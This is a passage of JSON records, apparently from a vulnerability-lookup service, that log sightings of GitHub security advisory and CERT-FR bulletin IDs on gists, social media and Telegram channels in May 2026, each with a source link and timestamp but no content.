"e67c81be-381a-4e1f-a27a-2db26772b19d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q4w7-56hr-83rm", "type": "seen", "source": "https://gist.github.com/alon710/8f2a8c09229ab2a61f27e4872d065fac", "content": "", "creation_timestamp": "2026-05-06T17:10:29.000000Z"}, {"uuid": "9c9fada2-82fc-4556-8c5d-99ece55293c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hg35-mp25-qf6h", "type": "seen", "source": "https://gist.github.com/alon710/232791296081f154e55f4a32d1309fc0", "content": "", "creation_timestamp": "2026-05-06T18:10:29.000000Z"}, {"uuid": "fc4b4775-992c-4630-82e7-586c6e72b0cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VRQV-52X7-RM4V", "type": "seen", "source": "https://gist.github.com/alon710/ddc2dae3143b446acfb966905cf3bf2f", "content": "", "creation_timestamp": "2026-05-06T19:10:29.000000Z"}, {"uuid": "d3d194eb-889b-4c0e-8b03-9557325400ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9G2Q-W3W2-VF7Q", "type": "seen", "source": "https://gist.github.com/alon710/30aa8db3db1787262bc908c85e9c7fec", "content": "", "creation_timestamp": "2026-05-06T19:40:28.000000Z"}, {"uuid": "3638f0da-9fab-4f3d-b97a-4603ecff90bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vxvc-cg7j-rwqj", "type": "seen", "source": "https://bsky.app/profile/andrewnez.mastodon.social.ap.brid.gy/post/3ml7stocimpn2", "content": "", "creation_timestamp": "2026-05-06T23:05:34.940889Z"}, {"uuid": "e14c8927-12a0-4985-b7b6-2730dcd81b13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fc67-c4hg-q653", "type": "seen", "source": "https://gist.github.com/alon710/685bd82e2bb849307786205498652c75", "content": "", "creation_timestamp": "2026-05-07T01:40:29.000000Z"}, {"uuid": "49ef2ecb-003e-464a-91e4-2562317c2114", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FPF5-4JW8-67X8", "type": "seen", "source": "https://gist.github.com/alon710/fbdb426cde042168e0871c7f8c96676d", "content": "", "creation_timestamp": "2026-05-07T02:10:29.000000Z"}, {"uuid": "dfc4b1a1-42ee-4409-8095-c4f6903c48f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MMPX-JH39-WRV6", "type": "seen", "source": "https://gist.github.com/alon710/14822427e82604da5dce18ab5080ddb7", "content": "", "creation_timestamp": "2026-05-07T03:40:29.000000Z"}, {"uuid": "c065cbc4-ba02-46e8-bd5a-04ff088219d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q6v9-r226-v65f", "type": "seen", "source": "https://gist.github.com/alon710/60dab51279f6b991c4df239e6fd329b2", "content": "", "creation_timestamp": "2026-05-07T04:10:29.000000Z"}, {"uuid": "9c4f4ead-2e44-4513-8452-ba1afa15d85e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-375f-4r2h-f99j", "type": "seen", "source": "https://gist.github.com/alon710/4ff6ed1a1dcb2ad425666d3faacd2bcb", "content": "", "creation_timestamp": "2026-05-07T04:40:29.000000Z"}, {"uuid": "723a6c78-71fa-44ed-b82c-b4236503ec1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c67r-gc9j-2qf7", "type": "seen", "source": "https://gist.github.com/alon710/536c02534caf441e3d6307e9b3c04050", "content": "", "creation_timestamp": "2026-05-07T05:10:29.000000Z"}, {"uuid": "421fd45f-428a-4c06-a7f5-32d1a6c6d2a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pf94-94m9-536p", "type": "seen", "source": "https://gist.github.com/alon710/7e14a0d3fcae150a08d7fce945893208", "content": "", "creation_timestamp": "2026-05-07T05:40:29.000000Z"}, {"uuid": "62d0adc1-1b73-4c73-bf9b-ebc5450682d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-frh3-6pv6-rc8j", "type": "seen", "source": "https://gist.github.com/alon710/560a262a37ded8b644e3892d54c879bb", "content": "", "creation_timestamp": "2026-05-07T06:10:29.000000Z"}, {"uuid": "3eedcade-03a2-4155-8295-7f1bdf01ecfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mlb66m4wc72g", "content": "", "creation_timestamp": "2026-05-07T12:01:09.544864Z"}, {"uuid": "bf06c934-1cd7-40c6-bfde-28e2928ae584", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-54PG-9963-V8VG", "type": "seen", "source": "https://gist.github.com/alon710/8afde5a27397b507920e321a8ed8bd55", "content": "", "creation_timestamp": "2026-05-07T18:40:29.000000Z"}, {"uuid": "9024478f-c370-4d61-9e31-8c43a54567a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gr3r-crp5-qrrm", "type": "seen", "source": "https://gist.github.com/alon710/56ddf2e902ba484e9ffc934e550f18ab", "content": "", "creation_timestamp": "2026-05-07T17:10:29.000000Z"}, {"uuid": "e0f326ee-ae0b-4c97-ae50-99edb9571153", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P64J-F4X9-WQ66", "type": "seen", "source": "https://gist.github.com/alon710/74b6abbcb632e245c7e0a9a5201c4015", "content": "", "creation_timestamp": "2026-05-07T21:40:28.000000Z"}, {"uuid": "8f4f571b-b652-4be0-bec8-d27198d0893f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v7qw-hx66-4w9x", "type": "seen", "source": "https://gist.github.com/alon710/02ced0e410eaef25c3c5fc6010a5eb1d", "content": "", "creation_timestamp": "2026-05-08T00:10:29.000000Z"}, {"uuid": "57c7daf8-f87d-4f6d-a985-e47d003cf44e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j7h9-2jh7-g967", "type": "seen", "source": "https://gist.github.com/alon710/c7b619fc9598b87dfd99f8a1b7bcf968", "content": "", "creation_timestamp": "2026-05-08T06:10:29.000000Z"}, {"uuid": "c8de7969-5cec-41a7-82da-720218a63363", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fpw6-hrg5-q5x5", "type": "seen", "source": "https://gist.github.com/alon710/0cdc02556b5fc971b210e0b65ed6b385", "content": "", "creation_timestamp": "2026-05-08T06:40:29.000000Z"}, {"uuid": "9ba2715c-dab7-46f3-ba75-2a60ede15dd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8mc6-xjpr-h98x", "type": "seen", "source": "https://gist.github.com/alon710/8ec3b5c119d8f39dd4dc65fc9a59f908", "content": "", "creation_timestamp": "2026-05-08T07:10:29.000000Z"}, {"uuid": "ca52042e-a203-43ca-b804-4ff3327f2432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pj86-cfqh-vqx6", "type": "seen", "source": "https://gist.github.com/Adcbda/3e82259b6deb6a426fbb5c89ed5ded87", "content": "", "creation_timestamp": "2026-05-08T07:36:05.000000Z"}, {"uuid": "4fb8fec6-3a29-4643-aebe-12a116dec144", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PJ6Q-4VQ4-R8CG", "type": "seen", "source": "https://gist.github.com/alon710/53845f36d8e625d63db830b2a5e081cb", "content": "", "creation_timestamp": "2026-05-08T07:40:29.000000Z"}, {"uuid": "2505fe8b-6c1e-4d30-99e7-b1f9cb090c9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rwvg-gp87-gh6f", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-2a45b4b2-24f4ef6243449139", "content": "", "creation_timestamp": "2026-05-08T08:33:58.265408Z"}, {"uuid": "4682862c-e9ce-44ba-8728-a05280c20975", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vp62-r36r-9xqp", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3mldpc3s27h2l", "content": "", "creation_timestamp": "2026-05-08T12:12:39.871027Z"}, {"uuid": "500c25b4-d405-415d-9898-fbb4f88c2fd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MG66-MRH9-M8JX", "type": "seen", "source": "Telegram/xvoYgOFnUf5jFw65_bW2FC7fcn6orx4l4LTjm0d68ZkOEzo", "content": "", "creation_timestamp": "2026-05-08T03:00:06.000000Z"}, {"uuid": "3e8525d9-e98f-4e17-b999-a53c44a4f1f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-267C-6GRR-H53F", "type": "seen", "source": "Telegram/xvoYgOFnUf5jFw65_bW2FC7fcn6orx4l4LTjm0d68ZkOEzo", "content": "", "creation_timestamp": "2026-05-08T03:00:06.000000Z"}, {"uuid": "56a4a890-27c4-4742-a7ea-e138b09ecacd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FFH4-J6H5-PG66", "type": "seen", "source": "https://t.me/bdufstecru/3146", "content": "", "creation_timestamp": "2026-05-08T14:03:16.000000Z"}, {"uuid": "917805b5-207b-4db3-80c9-4634b7472830", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H27V-PH7W-M9FP", "type": "seen", "source": "https://t.me/bdufstecru/3142", "content": "", "creation_timestamp": "2026-05-08T13:55:55.000000Z"}, {"uuid": "88556562-a36c-4a53-a7df-a3f534993c30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RGJ7-VG8V-J4WR", "type": "seen", "source": "https://gist.github.com/alon710/94f8b23cf2128584de5548f78104fff1", "content": "", "creation_timestamp": "2026-05-08T15:40:29.000000Z"}, {"uuid": "8287e0be-e95e-4f8c-885a-978022ae620c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3v85-fqvh-7rxf", "type": "seen", "source": "https://gist.github.com/alon710/8f139efaf98ab724348c38b11621f80e", "content": "", "creation_timestamp": "2026-05-08T16:10:29.000000Z"}, {"uuid": "995aba33-972a-49f9-aa4a-6bf48541a45c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2CM2-M3W5-GP2F", "type": "seen", "source": "https://gist.github.com/alon710/a7bb9826d4f58a9bb6ab3bd25eb4d508", "content": "", "creation_timestamp": "2026-05-08T16:40:29.000000Z"}, {"uuid": "ae75fa1d-accb-4010-970e-dad7818e3a2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8g7g-hmwm-6rv2", "type": "seen", "source": "https://gist.github.com/alon710/0c17dbed23743a79ef9af5d859725c2a", "content": "", "creation_timestamp": "2026-05-08T17:10:29.000000Z"}, {"uuid": "f7d8993d-36a8-4d0f-ae4b-16126e7dc41f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3j6-qgpj-74h6", "type": "seen", "source": "https://gist.github.com/alon710/0dcaec5097e434920cb749f30d284372", "content": "", "creation_timestamp": "2026-05-08T17:40:29.000000Z"}, {"uuid": "6ee9f6fa-5054-486e-a910-239303269762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HGR-XVRR-XPW3", "type": "seen", "source": "https://gist.github.com/alon710/a2e4841e35af8a18a7e5e75c8d1f5747", "content": "", "creation_timestamp": "2026-05-08T18:10:29.000000Z"}, {"uuid": "447af128-a1de-4658-bdd6-e9e635e5b094", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mpm8-cx2p-626q", "type": "seen", "source": "https://gist.github.com/alon710/81381888e21682cdeae4882d5cd6667d", "content": "", "creation_timestamp": "2026-05-08T19:10:29.000000Z"}, {"uuid": "6f08764d-714c-4975-88ef-e6cf7e51386c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v39h-62p7-jpjc", "type": "seen", "source": "https://gist.github.com/alon710/5589e0b554769b0725c771aeba30c7e4", "content": "", "creation_timestamp": "2026-05-08T19:40:29.000000Z"}, {"uuid": "22453933-0c11-4f38-a774-ec5ea7ad59bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h9hm-m2xj-4rq9", "type": "seen", "source": "https://gist.github.com/alon710/b2fb36b6ecfecf3424b0cb12c54264f5", "content": "", "creation_timestamp": "2026-05-08T20:10:29.000000Z"}, {"uuid": "3db6f8e2-a0fd-4f14-8b45-32d7a065eb3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-3v3m-wc6v-x4x3", "type": "seen", "source": "https://bsky.app/profile/kubonai.bsky.social/post/3mlem23uryx2s", "content": "", "creation_timestamp": "2026-05-08T20:47:09.515731Z"}, {"uuid": "a4ee6b97-6a96-4d31-9578-b425f18227d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-628h-q48j-jr6q", "type": "seen", "source": "https://gist.github.com/alon710/bf727aea4f480d1e2e016713a2841996", "content": "", "creation_timestamp": "2026-05-08T20:40:28.000000Z"}, {"uuid": "16558c14-5a7a-4deb-91d3-e0c54263e2b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QHH4-458H-XWH2", "type": "seen", "source": "https://gist.github.com/alon710/3ae104f1304147ec707d4c17fb2fda98", "content": "", "creation_timestamp": "2026-05-08T22:10:29.000000Z"}, {"uuid": "1f96551c-5e36-4588-86d8-18f37eeb4619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pj86-cfqh-vqx6", "type": "seen", "source": "https://gist.github.com/Adcbda/8715cb3a2a149d295bc127dde35f13d6", "content": "", "creation_timestamp": "2026-05-09T02:54:50.000000Z"}, {"uuid": "ed56307d-5d28-431d-a155-9b3ae69fdf65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v6wj-c83f-v46x", "type": "seen", "source": "https://gist.github.com/alon710/04224a7d95127340316da1f44fdb7a8c", "content": "", "creation_timestamp": "2026-05-09T04:40:29.000000Z"}, {"uuid": "6d5a9292-57e0-4dfe-b53c-97404fda77f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3g76-f9xq-8vp6", "type": "seen", "source": "https://gist.github.com/alon710/125ca2c976df983809333bd3a8522eed", "content": "", "creation_timestamp": "2026-05-09T05:10:28.000000Z"}, {"uuid": "47f17a55-365f-48cd-8a10-f3a6cd10977f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MV93-W799-CJ2W", "type": "seen", "source": "https://gist.github.com/alon710/be4c0540ec919d713e0bd6ccf621615c", "content": "", "creation_timestamp": "2026-05-09T05:40:29.000000Z"}, {"uuid": "baf91532-ac65-438e-add4-55a123197d5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2f25-pfq3-c7h8", "type": "seen", "source": "https://gist.github.com/alon710/5630cef7c3595002259238662d69e7b6", "content": "", "creation_timestamp": "2026-05-09T06:10:29.000000Z"}, {"uuid": "9157faac-7622-4f31-aa1b-d531fc637204", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ffh4-j6h5-pg66", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mlkfirx4jb26", "content": "", "creation_timestamp": "2026-05-11T04:06:05.548536Z"}, {"uuid": "eb11a4e4-33f6-4a51-a48b-86d635a3b3c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-021", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116555861087874714", "content": "", "creation_timestamp": "2026-05-11T12:08:27.576636Z"}, {"uuid": "5f2e6037-5547-4457-8de6-9dabd3377e52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-021", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mllah4ffi42y", "content": "", "creation_timestamp": "2026-05-11T12:08:19.468000Z"}, {"uuid": "8c297b7b-4cea-40cf-acee-1bb520453b7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9q28-ghcr-c4x3", "type": "seen", "source": "https://gist.github.com/alon710/f2ee63d3f5bee80df62671f0ee792142", "content": "", "creation_timestamp": "2026-05-11T14:10:29.000000Z"}, {"uuid": "c155a97c-edf3-4937-9dd7-801b6884118e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pw8r-6689-xvf4", "type": "seen", "source": "https://gist.github.com/alon710/8d25a2ec6d3cfd7d6115a0f90a1bb719", "content": "", "creation_timestamp": "2026-05-11T16:40:29.000000Z"}, {"uuid": "21e92d64-bcba-4bfd-b976-88b01c2c2d69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-021", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mllpcvwzr72t", "content": "", "creation_timestamp": "2026-05-11T16:34:25.089955Z"}, {"uuid": "0fa990b1-40a0-4503-b1c9-a44472a83bcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MHWJ-73QX-JQXM", "type": "seen", "source": "https://gist.github.com/alon710/4af81f21f7f20feffc4a4956d94d4de4", "content": "", "creation_timestamp": "2026-05-11T17:40:28.000000Z"}, {"uuid": "9aa4aeda-e6aa-4d13-bb82-f849f0068b12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qqcj-rghw-829x", "type": "seen", "source": "https://gist.github.com/alon710/40ab7c8f3b92395e6ea4963afcd7e9fa", "content": "", "creation_timestamp": "2026-05-11T18:10:29.000000Z"}, {"uuid": "94fd6bdc-fd6e-4b7e-b77c-d9b15df6d4ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m8rw-v4f6-8787", "type": "seen", "source": "https://infosec.exchange/users/shadowserver/statuses/116557316906275011", "content": "", "creation_timestamp": "2026-05-11T18:18:34.831967Z"}, {"uuid": "8aaaa82c-63c5-4c5b-885e-51dc76f4643b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j6cj-rp87-mfrx", "type": "seen", "source": "https://gist.github.com/tw89Coder/cd011dc1842625f821c171e41e812fbc", "content": "", "creation_timestamp": "2026-05-11T20:29:17.000000Z"}, {"uuid": "2b49aad5-04b7-451c-9487-8a36e8bd0802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q9fq-3rx9-7xcv", "type": "seen", "source": "https://gist.github.com/tw89Coder/cd011dc1842625f821c171e41e812fbc", "content": "", "creation_timestamp": "2026-05-11T20:29:17.000000Z"}, {"uuid": "501a0b7f-3bdf-4834-a77c-c8b5291831cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wxx8-76rw-96j2", "type": "seen", "source": "https://gist.github.com/tw89Coder/cd011dc1842625f821c171e41e812fbc", "content": "", "creation_timestamp": "2026-05-11T20:29:17.000000Z"}, {"uuid": "0937dde2-0c79-4733-b0f1-21c0352179ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-44qj-vh8c-5354", "type": "seen", "source": "https://gist.github.com/tw89Coder/cd011dc1842625f821c171e41e812fbc", "content": "", "creation_timestamp": "2026-05-11T20:29:17.000000Z"}, {"uuid": "d9dc4501-ea66-4b88-9133-d597e1e1be4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7cv-rxg3-hmpx", "type": "seen", "source": "https://gist.github.com/nrajlekhak/84bda8dc75e9212c7699a79bb34fa4dc", "content": "", "creation_timestamp": "2026-05-12T04:52:42.000000Z"}, {"uuid": "dac12874-baec-456c-8149-12e040ed3e34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7cv-rxg3-hmpx", "type": "seen", "source": "https://gist.github.com/maskeynihal/e780ed1e48c56592fc6612591a4bd420", "content": "", "creation_timestamp": "2026-05-12T11:45:22.000000Z"}, {"uuid": "3ce000b1-b184-4bc6-a259-189f2b36226f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8xf4-w7qw-pjjw", "type": "seen", "source": "https://gist.github.com/feranmi2002/a79078da33b34369681222b0a03ab04d", "content": "", "creation_timestamp": "2026-05-12T12:19:28.000000Z"}, {"uuid": "c05705ef-f926-4176-b853-299c4767d0e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2x45-7fc3-mxwq", "type": "seen", "source": "https://gist.github.com/feranmi2002/a79078da33b34369681222b0a03ab04d", "content": "", "creation_timestamp": "2026-05-12T12:19:28.000000Z"}, {"uuid": "266564af-418a-4972-9268-aa8d7a7a8ebc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rhv4-8758-jx7v", "type": "seen", "source": "https://gist.github.com/alon710/d3518b26e6387505ec4774e026b70deb", "content": "", "creation_timestamp": "2026-05-12T15:40:29.000000Z"}, {"uuid": "6db5b618-9c52-4393-9caf-427a0f1b6b08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x3r2-fj3r-g5mv", "type": "seen", "source": "https://gist.github.com/alon710/001644e5a9eb201b408c3975d7ef4c5c", "content": "", "creation_timestamp": "2026-05-12T16:10:29.000000Z"}, {"uuid": "c335ab70-dd97-4524-9da5-d76224cbfe6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7cv-rxg3-hmpx", "type": "seen", "source": "https://gist.github.com/danw-relaytech/d18d8484b1f37e6e84349fe1e8e49732", "content": "", "creation_timestamp": "2026-05-12T16:58:08.000000Z"}, {"uuid": "d3ec4a03-5376-4c0c-9509-c251d7a20722", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7cv-rxg3-hmpx", "type": "seen", "source": "https://gist.github.com/srijanshukla18/49821c8704c4222e2f84221b21340e3f", "content": "", "creation_timestamp": "2026-05-12T20:26:22.000000Z"}, {"uuid": "e89f1478-2d52-47e3-953d-6f3689830c05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C4J6-FC7J-M34R", "type": "seen", "source": "https://t.me/GithubRedTeam/84034", "content": "", "creation_timestamp": "2026-05-13T06:02:34.000000Z"}, {"uuid": "05c5157c-97ee-41ca-94b2-3ac06843f883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j274-39qw-32c9", "type": "seen", "source": "https://gist.github.com/alon710/ef3efe37eacc8d375596cddc56ee3bfb", "content": "", "creation_timestamp": "2026-05-13T15:40:29.000000Z"}, {"uuid": "b0be1288-d394-45e7-8229-bacd33f8f37c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3V3M-WC6V-X4X3", "type": "seen", "source": "https://t.me/bdufstecru/3158", "content": "", "creation_timestamp": 